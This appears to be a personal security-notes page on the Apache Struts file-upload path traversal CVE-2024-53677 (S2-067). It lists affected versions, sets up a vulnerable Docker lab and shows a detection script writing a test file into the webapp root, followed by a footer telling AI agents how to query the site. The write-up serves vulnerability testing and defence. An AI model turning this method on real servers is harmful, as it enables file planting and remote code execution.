# Struts - CVE-2024-53677 / S2-067

File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable <mark style="color:red;">**paths traversal**</mark> and under some circumstances this can lead to uploading a malicious file which can be used to perform <mark style="color:red;">**Remote Code Execution**</mark>.&#x20;

Vulnerable versions:

* Struts 2.0.0 - Struts 2.3.37 (End-of-Life),
* Struts 2.5.0 - Struts 2.5.33, and
* Struts 6.0.0 - Struts 6.3.0.2

References:&#x20;

* <https://nvd.nist.gov/vuln/detail/CVE-2024-53677>
* <https://cwiki.apache.org/confluence/display/WW/S2-067>
* <https://xz.aliyun.com/t/13172?time__1311=GqmhkGOG8GkD%2FD0lD2nbDkYoiteSKcepD>

***

## Proof-of-Concept

### Setup test environment

```bash
» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
» sudo docker run -p 8081:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name struts-6.3.0.1 struts-6.3.0.1
```

```html
» curl http://127.0.0.1:8081/upload.action

<html>
  <head>
    <title>File upload</title>
  </head>
  <body>
    <h1>Apache Struts 6.3.0.1</h1>
    <p>Welcome to Apache Struts 6.3.0.1 lab. This application is vulnerable to CVE-2023-50164 and CVE-2024-53677.</p>
    <form id="upload" name="upload" action="/upload.action;jsessionid=196954CE343A603EC7EE26FFF611D302" method="post" enctype="multipart/form-data">
      <table class="wwFormTable">
        <tr>
          <td class="tdLabel"></td>
          <td 
            class="tdInput"            
            ><input type="file" name="upload" id="upload_upload"/></td>
        </tr>
        <tr>
          <td colspan="2">
            <div class="formButton"><input type="submit" value="Submit" id="upload_0"/></div>
          </td>
        </tr>
      </table>
    </form>
  </body>
</html>
```

### Exploit

```bash
» curl http://127.0.0.1:8081/vuln_test.txt                                  
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>

» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.

» curl http://127.0.0.1:8081/vuln_test.txt                                  
CVE-2024-53677 / S2-067 detection test.

» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan  7 11:23 .
drwxr-xr-x 1 root root 4096 Jan  7 11:18 ..
drwxr-x--- 2 root root 4096 Jan  7 11:14 forbidden
-rw-r----- 1 root root  226 Jan  7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan  7 11:14 META-INF
-rw-r----- 1 root root   39 Jan  7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan  7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt 
CVE-2024-53677 / S2-067 detection test.
```

Check script from: <https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/apache/struts-cve-2024-53677-s2-067.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.